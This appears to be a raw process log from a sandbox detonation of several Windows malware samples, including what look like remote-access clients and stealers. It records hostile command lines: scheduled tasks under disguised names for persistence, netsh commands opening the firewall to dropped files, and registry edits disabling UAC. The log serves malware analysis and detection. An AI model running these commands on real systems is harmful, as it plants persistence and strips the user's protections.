C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\q1wnx5ir.exe
"C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 7136 -ip 7136
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7136 -s 484
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Users\Admin\Desktop\Files\networkmanager.exe
"C:\Users\Admin\Desktop\Files\networkmanager.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gpjwRu1uMfKS.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UlHU2iZsPmmk.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\networkmanager.exe
"C:\Users\Admin\Desktop\Files\networkmanager.exe"
C:\Users\Admin\Desktop\Files\q1wnx5ir.exe
"C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 248 -ip 248
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 248 -s 456
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1S2mZNnufXOJ.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4DAeqXvwV6Ud.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YeiwQ7RofxNs.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\q1wnx5ir.exe
"C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7176 -ip 7176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7176 -s 416
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gsWPoyEdbx0v.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\Rage.exe
"C:\Users\Admin\Desktop\Files\Rage.exe"
C:\ProgramData\wvtynvwe\AutoIt3.exe
"C:\ProgramData\wvtynvwe\AutoIt3.exe" C:\ProgramData\wvtynvwe\clxs.a3x
C:\Users\Admin\Desktop\Files\856.exe
"C:\Users\Admin\Desktop\Files\856.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\856.exe" "856.exe" ENABLE
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\netsh.exe
netsh firewall delete allowedprogram "C:\Users\Admin\Desktop\Files\856.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\856.exe" "856.exe" ENABLE
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe
"C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe"
C:\Users\Admin\Desktop\Files\ciscotest.exe
"C:\Users\Admin\Desktop\Files\ciscotest.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\svc1.exe
"C:\Users\Admin\Desktop\Files\svc1.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\FransescoPast.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zblqEg0ftqZ0.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\alexshlu.exe
"C:\Users\Admin\Desktop\Files\alexshlu.exe"
C:\Users\Admin\Desktop\Files\alexshlu.exe
"C:\Users\Admin\Desktop\Files\alexshlu.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn StUpdate /tr C:\Users\Admin\AppData\Local\Temp/StUpdate.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\StUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\StUpdate.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zblqEg0ftqZ0.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HG73Nmet0qaJ.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\melt.txt
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe
"C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tFMKq6EdJqBP.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Windows\system32\chcp.com
chcp 65001
C:\ProgramData\sommnx\bmxe.exe
C:\ProgramData\sommnx\bmxe.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Local\Temp\StUpdate.exe
C:\Users\Admin\AppData\Local\Temp/StUpdate.exe
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tel0N9UQ34hY.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\msf.exe
"C:\Users\Admin\Desktop\Files\msf.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6200 -ip 6200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 1236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6200 -ip 6200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 1244
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\ProgramData\sommnx\bmxe.exe
"C:\ProgramData\sommnx\bmxe.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Rps1Drc3i6nT.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LoDrERSbzhN2.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 796 -ip 796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 796 -s 1916
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\jignesh.exe
"C:\Users\Admin\Desktop\Files\jignesh.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe
"C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BvcyyA97w0hk.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe
"C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\Desktop\Files\svchost.exe
svchost.exe
C:\Windows\SysWOW64\rmclient.exe
rmclient.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004BC 0x00000000000004C8
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\yoyf.exe
"C:\Users\Admin\Desktop\Files\yoyf.exe"
C:\Users\Admin\Desktop\Files\SharpHound.exe
"C:\Users\Admin\Desktop\Files\SharpHound.exe"
C:\Users\Admin\Desktop\Files\winX32.exe
"C:\Users\Admin\Desktop\Files\winX32.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\ProgramData\sommnx\bmxe.exe
C:\ProgramData\sommnx\bmxe.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Local\Temp\StUpdate.exe
C:\Users\Admin\AppData\Local\Temp/StUpdate.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\g9SSX2bshVB0.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\SharpHound.exe
"C:\Users\Admin\Desktop\Files\SharpHound.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Users\Admin\Desktop\Files\winX32.exe
"C:\Users\Admin\Desktop\Files\winX32.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WZk6Sw3oUfda.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\ProgramData\sommnx\bmxe.exe
"C:\ProgramData\sommnx\bmxe.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UJFyZlg1NKTf.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\jignesh.exe
"C:\Users\Admin\Desktop\Files\jignesh.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pHW7WegWhary.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\Discord.exe
"C:\Users\Admin\Desktop\Files\Discord.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe
"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gM7yqR5MXayd.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qaFVyoxPIEUe.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\ProgramData\sommnx\bmxe.exe
C:\ProgramData\sommnx\bmxe.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\StUpdate.exe
C:\Users\Admin\AppData\Local\Temp/StUpdate.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YPe0OYzvdTtm.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uLv2aTQc0OcY.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\ProgramData\sommnx\bmxe.exe
"C:\ProgramData\sommnx\bmxe.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XwvStCtpEqoJ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
